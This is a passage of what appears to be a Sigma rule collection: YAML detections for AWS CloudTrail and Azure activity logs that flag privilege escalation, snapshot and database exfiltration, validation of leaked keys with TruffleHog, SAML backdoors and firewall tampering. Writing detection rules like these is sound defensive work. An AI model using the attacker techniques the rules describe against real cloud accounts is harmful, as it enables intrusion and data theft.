level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_lambda_function_url.yml ================================================ title: New AWS Lambda Function URL Configuration Created id: ec541962-c05a-4420-b9ea-84de072d18f4 status: experimental description: | Detects when a user creates a Lambda function URL configuration, which could be used to expose the function to the internet and potentially allow unauthorized access to the function's IAM role for AWS API calls. This could give an adversary access to the privileges associated with the Lambda service role that is attached to that function. references: - https://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc - https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws author: Ivan Saakov date: 2024-12-19 tags: - attack.initial-access - attack.privilege-escalation logsource: product: aws service: cloudtrail detection: selection: eventSource: lambda.amazonaws.com eventName: 'CreateFunctionUrlConfig' condition: selection falsepositives: - Creating a Lambda function URL configuration may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Creating a Lambda function URL configuration from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_new_lambda_layer_attached.yml ================================================ title: AWS New Lambda Layer Attached id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d status: test description: | Detects when a user attached a Lambda layer to an existing Lambda function. 
A malicious Lambda layer could execute arbitrary code in the context of the function's IAM role. This would give an adversary access to resources that the function has access to. references: - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html - https://github.com/clearvector/lambda-spy author: Austin Songer date: 2021-09-23 modified: 2025-03-17 tags: - attack.privilege-escalation logsource: product: aws service: cloudtrail detection: selection: eventSource: lambda.amazonaws.com eventName|startswith: 'UpdateFunctionConfiguration' requestParameters.layers|contains: '*' condition: selection falsepositives: - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml ================================================ title: AWS Glue Development Endpoint Activity id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 status: test description: Detects possible suspicious glue development endpoint activity. references: - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html author: Austin Songer @austinsonger date: 2021-10-03 modified: 2022-12-18 tags: - attack.privilege-escalation logsource: product: aws service: cloudtrail detection: selection: eventSource: 'glue.amazonaws.com' eventName: - 'CreateDevEndpoint' - 'DeleteDevEndpoint' - 'UpdateDevEndpoint' condition: selection falsepositives: - Glue Development Endpoint Activity may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_rds_change_master_password.yml ================================================ title: AWS RDS Master Password Change id: 8a63cdd4-6207-414a-85bc-7e032bd3c1a2 status: test description: Detects a change of the master user password of an RDS DB instance (ModifyDBInstance with a pending masterUserPassword). An attacker who can reset the master password gains direct access to the database contents, for example after restoring a snapshot they control, so this may be part of data exfiltration. references: - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py author: faloker date: 2020-02-12 modified: 2022-10-05 tags: - attack.exfiltration - attack.t1020 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: rds.amazonaws.com responseElements.pendingModifiedValues.masterUserPassword|contains: '*' eventName: ModifyDBInstance condition: selection_source falsepositives: - Legitimate master password rotations (scheduled credential rotation or an administrator recovering access); verify that the caller identity matches the expected rotation process. level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_rds_dbcluster_actions.yml ================================================ title: Modification or Deletion of an AWS RDS Cluster id: 457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c status: experimental description: Detects modifications to an RDS cluster (ModifyDBCluster) or its deletion (DeleteDBCluster). ModifyDBCluster is emitted for any configuration change, so triage should look at which attributes were changed, for example the master password, public accessibility or deletion protection, before treating the event as a possible data exfiltration attempt, unauthorized access, or exposure of sensitive information. 
references: - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance author: Ivan Saakov date: 2024-12-06 tags: - attack.exfiltration - attack.t1020 logsource: product: aws service: cloudtrail detection: selection: eventSource: rds.amazonaws.com eventName: - ModifyDBCluster - DeleteDBCluster condition: selection falsepositives: - Verify if the modification or deletion was performed by an authorized administrator. - Confirm if the modification or deletion was part of a planned change or maintenance activity. level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_rds_public_db_restore.yml ================================================ title: Restore Public AWS RDS Instance id: c3f265c7-ff03-4056-8ab2-d486227b4599 status: test description: Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration. 
references: - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py author: faloker date: 2020-02-12 modified: 2022-10-09 tags: - attack.exfiltration - attack.t1020 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: rds.amazonaws.com responseElements.publiclyAccessible: 'true' eventName: RestoreDBInstanceFromDBSnapshot condition: selection_source falsepositives: - Unknown level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_root_account_usage.yml ================================================ title: AWS Root Credentials id: 8ad1600d-e9dc-4251-b0ee-a65268f29add status: test description: Detects AWS root account usage references: - https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html author: vitaliy0x1 date: 2020-01-21 modified: 2022-10-09 tags: - attack.privilege-escalation - attack.defense-evasion - attack.initial-access - attack.persistence - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection_usertype: userIdentity.type: Root selection_eventtype: eventType: AwsServiceEvent condition: selection_usertype and not selection_eventtype falsepositives: - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml ================================================ title: AWS Route 53 Domain Transfer Lock Disabled id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 status: test description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. 
references: - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml - https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html - https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html author: Elastic, Austin Songer @austinsonger date: 2021-07-22 modified: 2022-10-09 tags: - attack.persistence - attack.privilege-escalation - attack.credential-access - attack.t1098 logsource: product: aws service: cloudtrail detection: selection: eventSource: route53.amazonaws.com eventName: DisableDomainTransferLock condition: selection falsepositives: - A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml ================================================ title: AWS Route 53 Domain Transferred to Another Account id: b056de1a-6e6e-4e40-a67e-97c9808cf41b status: test description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. 
references: - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml author: Elastic, Austin Songer @austinsonger date: 2021-07-22 modified: 2022-10-09 tags: - attack.persistence - attack.credential-access - attack.privilege-escalation - attack.t1098 logsource: product: aws service: cloudtrail detection: selection: eventSource: route53.amazonaws.com eventName: TransferDomainToAnotherAwsAccount condition: selection falsepositives: - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_s3_data_management_tampering.yml ================================================ title: AWS S3 Data Management Tampering id: 78b3756a-7804-4ef7-8555-7b9024a02e2d status: test description: Detects when a user tampers with S3 data management in Amazon Web Services. 
references: - https://github.com/elastic/detection-rules/pull/1145/files - https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html - https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html - https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html - https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html author: Austin Songer @austinsonger date: 2021-07-24 modified: 2022-10-09 tags: - attack.exfiltration - attack.t1537 logsource: product: aws service: cloudtrail detection: selection: eventSource: s3.amazonaws.com eventName: - PutBucketLogging - PutBucketWebsite - PutEncryptionConfiguration - PutLifecycleConfiguration - PutReplicationConfiguration - ReplicateObject - RestoreObject condition: selection falsepositives: - A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_securityhub_finding_evasion.yml ================================================ title: AWS SecurityHub Findings Evasion id: a607e1fe-74bf-4440-a3ec-b059b9103157 status: stable description: Detects the modification of the findings on SecurityHub. 
references: - https://docs.aws.amazon.com/cli/latest/reference/securityhub/ author: Sittikorn S date: 2021-06-28 tags: - attack.defense-evasion - attack.t1562 logsource: product: aws service: cloudtrail detection: selection: eventSource: securityhub.amazonaws.com eventName: - 'BatchUpdateFindings' - 'DeleteInsight' - 'UpdateFindings' - 'UpdateInsight' condition: selection falsepositives: - System or network administrator behaviors, e.g. analysts routinely updating finding workflow status or suppressing findings - DEV, UAT and SAT environments, where findings are frequently updated; apply this rule to PROD environments only. level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_snapshot_backup_exfiltration.yml ================================================ title: AWS Snapshot Backup Exfiltration id: abae8fec-57bd-4f87-aff6-6e3db989843d status: test description: Detects the modification of an EC2 snapshot's attributes (ModifySnapshotAttribute). Sharing a snapshot with another AWS account, or making it public, lets the data be copied out of the account. The selection matches every attribute modification, including permission removals, so triage should inspect the request parameters for permission grants to other account IDs or to all accounts. references: - https://www.justice.gov/file/1080281/download author: Darin Smith date: 2021-05-17 modified: 2021-08-19 tags: - attack.exfiltration - attack.t1537 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: ec2.amazonaws.com eventName: ModifySnapshotAttribute condition: selection_source falsepositives: - Valid change to a snapshot's permissions, e.g. sharing a snapshot with a known account of the same organization level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml ================================================ title: AWS Identity Center Identity Provider Change id: d3adb3ef-b7e7-4003-9092-1924c797db35 status: test description: | Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation. 
references: - https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html - https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html - https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html author: Michael McIntyre @wtfender date: 2023-09-27 tags: - attack.persistence - attack.credential-access - attack.defense-evasion - attack.t1556 logsource: product: aws service: cloudtrail detection: selection: eventSource: - 'sso-directory.amazonaws.com' - 'sso.amazonaws.com' eventName: - 'AssociateDirectory' - 'DisableExternalIdPConfigurationForDirectory' - 'DisassociateDirectory' - 'EnableExternalIdPConfigurationForDirectory' condition: selection falsepositives: - Authorized changes to the AWS account's identity provider, e.g. a planned migration to a new external IdP; confirm the change with the identity team before closing level: high ================================================ FILE: rules/cloud/aws/cloudtrail/aws_sts_assumerole_misuse.yml ================================================ title: AWS STS AssumeRole Misuse id: 905d389b-b853-46d0-9d3d-dea0d3a3cd49 status: test description: Identifies API activity performed with credentials obtained through AssumeRole. Attackers could use assumed roles to move laterally and escalate privileges. Note that the selection matches every CloudTrail event whose caller is an assumed-role session issued by a role, not the AssumeRole call itself; in most accounts this covers the bulk of activity from instance profiles, Lambda functions and automation, so the rule is only usable as a low-severity baseline or as enrichment for correlation rather than as a standalone alert. references: - https://github.com/elastic/detection-rules/pull/1214 - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html author: Austin Songer @austinsonger date: 2021-07-24 modified: 2022-10-09 tags: - attack.lateral-movement - attack.privilege-escalation - attack.defense-evasion - attack.t1548 - attack.t1550 - attack.t1550.001 logsource: product: aws service: cloudtrail detection: selection: userIdentity.type: AssumedRole userIdentity.sessionContext.sessionIssuer.type: Role condition: selection falsepositives: - AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - AssumeRole from unfamiliar users or hosts should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule. - Automated processes that uses Terraform may lead to false positives. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_sts_getcalleridentity_trufflehog.yml ================================================ title: AWS STS GetCallerIdentity Enumeration Via TruffleHog id: 9b1b8e9b-0a5d-4af1-9d2f-4c4b6e7c2c9d status: experimental description: | Detects the use of TruffleHog for AWS credential validation by identifying GetCallerIdentity API calls where the userAgent indicates TruffleHog. Threat actors leverage TruffleHog to enumerate and validate exposed AWS keys. Successful exploitation allows threat actors to confirm the validity of compromised AWS credentials, facilitating further unauthorized access and actions within the AWS environment. references: - https://www.rapid7.com/blog/post/tr-crimson-collective-a-new-threat-group-observed-operating-in-the-cloud/ - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetCallerIdentity.html - https://github.com/trufflesecurity/trufflehog author: Adan Alvarez @adanalvarez date: 2025-10-12 tags: - attack.discovery - attack.t1087.004 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'sts.amazonaws.com' eventName: 'GetCallerIdentity' userAgent|contains: 'TruffleHog' condition: selection falsepositives: - Legitimate internal security scanning or key validation that intentionally uses TruffleHog. Authorize and filter known scanner roles, IP ranges, or assumed roles as needed. level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_sts_getsessiontoken_misuse.yml ================================================ title: AWS STS GetSessionToken Misuse id: b45ab1d2-712f-4f01-a751-df3826969807 status: test description: Identifies the suspicious use of GetSessionToken. 
Tokens could be created and used by attackers to move laterally and escalate privileges. references: - https://github.com/elastic/detection-rules/pull/1213 - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html author: Austin Songer @austinsonger date: 2021-07-24 modified: 2022-10-09 tags: - attack.lateral-movement - attack.privilege-escalation - attack.defense-evasion - attack.t1548 - attack.t1550 - attack.t1550.001 logsource: product: aws service: cloudtrail detection: selection: eventSource: sts.amazonaws.com eventName: GetSessionToken userIdentity.type: IAMUser condition: selection falsepositives: - GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/aws/cloudtrail/aws_susp_saml_activity.yml ================================================ title: AWS Suspicious SAML Activity id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e status: test description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. 
references: - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html author: Austin Songer date: 2021-09-22 modified: 2022-12-18 tags: - attack.defense-evasion - attack.initial-access - attack.lateral-movement - attack.persistence - attack.privilege-escalation - attack.t1078 - attack.t1548 - attack.t1550 - attack.t1550.001 logsource: product: aws service: cloudtrail detection: selection_sts: eventSource: 'sts.amazonaws.com' eventName: 'AssumeRoleWithSAML' selection_iam: eventSource: 'iam.amazonaws.com' eventName: 'UpdateSAMLProvider' condition: 1 of selection_* falsepositives: - Automated processes that uses Terraform may lead to false positives. - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_update_login_profile.yml ================================================ title: AWS User Login Profile Was Modified id: 055fb148-60f8-462d-ad16-26926ce050f1 status: test description: | Detects activity when someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. 
references: - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation author: toffeebr33k date: 2021-08-09 modified: 2024-04-26 tags: - attack.persistence - attack.privilege-escalation - attack.t1098 logsource: product: aws service: cloudtrail detection: selection: eventSource: 'iam.amazonaws.com' eventName: 'UpdateLoginProfile' filter_main_user_identity: userIdentity.arn|fieldref: requestParameters.userName condition: selection and not 1 of filter_main_* falsepositives: - Legitimate user account administration level: high ================================================ FILE: rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_new_server.yml ================================================ title: Azure Active Directory Hybrid Health AD FS New Server id: 288a39fc-4914-4831-9ada-270e9dc12cb4 status: test description: | This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service. A threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server. This can be done programmatically via HTTP requests to Azure. 
references: - https://o365blog.com/post/hybridhealthagent/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021-08-26 modified: 2023-10-11 tags: - attack.defense-evasion - attack.t1578 logsource: product: azure service: activitylogs detection: selection: CategoryValue: 'Administrative' ResourceProviderValue: 'Microsoft.ADHybridHealthService' ResourceId|contains: 'AdFederationService' OperationNameValue: 'Microsoft.ADHybridHealthService/services/servicemembers/action' condition: selection falsepositives: - Legitimate AD FS servers added to an AAD Health AD FS service instance level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_aadhybridhealth_adfs_service_delete.yml ================================================ title: Azure Active Directory Hybrid Health AD FS Service Delete id: 48739819-8230-4ee3-a8ea-e0289d1fb0ff status: test description: | This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant. A threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs. The health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure. 
references: - https://o365blog.com/post/hybridhealthagent/ author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021-08-26 modified: 2023-10-11 tags: - attack.defense-evasion - attack.t1578.003 logsource: product: azure service: activitylogs detection: selection: CategoryValue: 'Administrative' ResourceProviderValue: 'Microsoft.ADHybridHealthService' ResourceId|contains: 'AdFederationService' OperationNameValue: 'Microsoft.ADHybridHealthService/services/delete' condition: selection falsepositives: - Legitimate AAD Health AD FS service instances being deleted in a tenant level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_ad_user_added_to_admin_role.yml ================================================ title: User Added to an Administrator's Azure AD Role id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 status: test description: User Added to an Administrator's Azure AD Role references: - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/ author: Raphaël CALVET, @MetallicHack date: 2021-10-04 modified: 2022-10-09 tags: - attack.initial-access - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.t1098.003 - attack.t1078 logsource: product: azure service: activitylogs detection: selection: Operation: 'Add member to role.' Workload: 'AzureActiveDirectory' ModifiedProperties{}.NewValue|endswith: - 'Admins' - 'Administrator' condition: selection falsepositives: - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_application_deleted.yml ================================================ title: Azure Application Deleted id: 410d2a41-1e6d-452f-85e5-abdd8257a823 status: test description: Identifies when a application is deleted in Azure. 
references: - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy author: Austin Songer @austinsonger date: 2021-09-03 modified: 2022-10-09 tags: - attack.defense-evasion - attack.impact - attack.t1489 logsource: product: azure service: activitylogs detection: selection: properties.message: - Delete application - Hard Delete application condition: selection falsepositives: - Application being deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_application_gateway_modified_or_deleted.yml ================================================ title: Azure Application Gateway Modified or Deleted id: ad87d14e-7599-4633-ba81-aeb60cfe8cd6 status: test description: Identifies when an application gateway is modified or deleted. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer date: 2021-08-16 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE condition: selection falsepositives: - Application gateway being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml ================================================ title: Azure Application Security Group Modified or Deleted id: 835747f1-9329-40b5-9cc3-97d465754ce6 status: test description: Identifies when an application security group is modified or deleted. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer date: 2021-08-16 modified: 2022-08-23 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE condition: selection falsepositives: - Application security group being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_container_registry_created_or_deleted.yml ================================================ title: Azure Container Registry Created or Deleted id: 93e0ef48-37c8-49ed-a02c-038aab23628e status: test description: Detects when a Container Registry is created or deleted. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 author: Austin Songer @austinsonger date: 2021-08-07 modified: 2022-08-23 tags: - attack.impact - attack.t1485 - attack.t1496 - attack.t1489 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/WRITE - MICROSOFT.CONTAINERREGISTRY/REGISTRIES/DELETE condition: selection falsepositives: - Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: low ================================================ FILE: rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml ================================================ title: Number Of Resource Creation Or Deployment Activities id: d2d901db-7a75-45a1-bc39-0cbf00812192 status: test description: Number of VM creations or deployment activities occur in Azure via the azureactivity log. 
references: - https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml author: sawwinnnaung date: 2020-05-07 modified: 2023-10-11 tags: - attack.privilege-escalation - attack.persistence - attack.t1098 logsource: product: azure service: activitylogs detection: keywords: - Microsoft.Compute/virtualMachines/write - Microsoft.Resources/deployments/write condition: keywords falsepositives: - Valid change level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_device_no_longer_managed_or_compliant.yml ================================================ title: Azure Device No Longer Managed or Compliant id: 542b9912-c01f-4e3f-89a8-014c48cdca7d status: test description: Identifies when a device in azure is no longer managed or compliant references: - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory author: Austin Songer @austinsonger date: 2021-09-03 modified: 2022-10-09 tags: - attack.impact logsource: product: azure service: activitylogs detection: selection: properties.message: - Device no longer compliant - Device no longer managed condition: selection falsepositives: - Administrator may have forgotten to review the device. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_device_or_configuration_modified_or_deleted.yml ================================================ title: Azure Device or Configuration Modified or Deleted id: 46530378-f9db-4af9-a9e5-889c177d3881 status: test description: Identifies when a device or device configuration in azure is modified or deleted. 
references: - https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#core-directory author: Austin Songer @austinsonger date: 2021-09-03 modified: 2022-10-09 tags: - attack.impact - attack.t1485 - attack.t1565.001 logsource: product: azure service: activitylogs detection: selection: properties.message: - Delete device - Delete device configuration - Update device - Update device configuration condition: selection falsepositives: - Device or device configuration being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_dns_zone_modified_or_deleted.yml ================================================ title: Azure DNS Zone Modified or Deleted id: af6925b0-8826-47f1-9324-337507a0babd status: test description: Identifies when DNS zone is modified or deleted. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact - attack.t1565.001 logsource: product: azure service: activitylogs detection: selection: operationName|startswith: 'MICROSOFT.NETWORK/DNSZONES' operationName|endswith: - '/WRITE' - '/DELETE' condition: selection falsepositives: - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 
level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_firewall_modified_or_deleted.yml ================================================ title: Azure Firewall Modified or Deleted id: 512cf937-ea9b-4332-939c-4c2c94baadcd status: test description: Identifies when a firewall is created, modified, or deleted. references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact - attack.defense-evasion - attack.t1562.004 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE condition: selection falsepositives: - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_firewall_rule_collection_modified_or_deleted.yml ================================================ title: Azure Firewall Rule Collection Modified or Deleted id: 025c9fe7-db72-49f9-af0d-31341dd7dd57 status: test description: Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted. 
references: - https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations author: Austin Songer @austinsonger date: 2021-08-08 modified: 2022-08-23 tags: - attack.impact - attack.defense-evasion - attack.t1562.004 logsource: product: azure service: activitylogs detection: selection: operationName: - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/DELETE - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/DELETE condition: selection falsepositives: - Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. level: medium ================================================ FILE: rules/cloud/azure/activity_logs/azure_granting_permission_detection.yml ================================================ title: Granting Of Permissions To An Account id: a622fcd2-4b5a-436a-b8a2-a4171161833c status: test description: Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. 
